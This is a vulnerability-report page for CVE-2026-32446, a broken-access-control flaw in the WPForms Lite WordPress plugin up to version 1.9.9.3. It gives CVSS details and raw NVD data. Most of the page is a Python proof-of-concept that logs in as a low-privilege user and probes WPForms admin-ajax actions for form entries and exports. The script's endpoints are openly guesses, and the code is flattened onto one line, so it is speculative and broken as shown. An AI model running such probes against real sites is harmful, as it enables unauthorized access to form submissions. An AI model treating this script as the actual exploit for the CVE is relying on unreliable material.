Security Vulnerability Report
中文
CVE-2026-32446 CVSS 4.3 MEDIUM

CVE-2026-32446

Published: 2026-03-13 19:55:05
Last Modified: 2026-04-22 21:30:26

Description

Missing Authorization vulnerability in Syed Balkhi Contact Form by WPForms wpforms-lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Contact Form by WPForms: from n/a through <= 1.9.9.3.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WPForms Lite <= 1.9.9.3
Contact Form by WPForms (wpforms-lite) <= 1.9.9.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys from urllib.parse import urljoin # CVE-2026-32446 PoC - WPForms Broken Access Control # Target: WordPress site with WPForms Lite plugin <= 1.9.9.3 def exploit_cve_2026_32446(target_url, username, password): """ Exploit missing authorization in WPForms plugin This PoC demonstrates accessing admin functions with low privilege account """ session = requests.Session() # Step 1: Login to WordPress with low privilege account login_url = urljoin(target_url, 'wp-login.php') login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': target_url, 'testcookie': '1' } print(f'[*] Logging in as {username}...') response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in str(session.cookies): print('[-] Login failed') return False print('[+] Login successful') # Step 2: Try to access WPForms admin functionality # Common WPForms AJAX endpoints that might be vulnerable vulnerable_endpoints = [ '/wp-admin/admin-ajax.php?action=wpforms_entries_view', '/wp-admin/admin-ajax.php?action=wpforms_form_preview', '/wp-admin/admin-ajax.php?action=wpforms_tools_entry_export', '/wp-admin/admin-ajax.php?action=wpforms_process_submission' ] for endpoint in vulnerable_endpoints: url = urljoin(target_url, endpoint) print(f'[*] Testing endpoint: {endpoint}') response = session.get(url) # Check if we get admin-level data without proper authorization if response.status_code == 200: if 'form_id' in response.text or 'entries' in response.text: print(f'[+] VULNERABLE: {endpoint} - Access control bypassed!') print(f'[+] Response preview: {response.text[:200]}...') else: print(f'[-] Endpoint returned data but no sensitive content') else: print(f'[-] Endpoint returned status: {response.status_code}') return True if __name__ == '__main__': if len(sys.argv) < 4: print('Usage: python cve-2026-32446.py <target_url> <username> <password>') print('Example: python cve-2026-32446.py http://example.com subscriber password123') sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_cve_2026_32446(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32446", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:55:05.290", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Syed Balkhi Contact Form by WPForms wpforms-lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Contact Form by WPForms: from n/a through <= 1.9.9.3."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en el formulario de contacto de Syed Balkhi por WPForms wpforms-lite permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Contact Form by WPForms: desde n/a hasta &lt;= 1.9.9.3."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wpforms-lite/vulnerability/wordpress-contact-form-by-wpforms-plugin-1-9-9-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}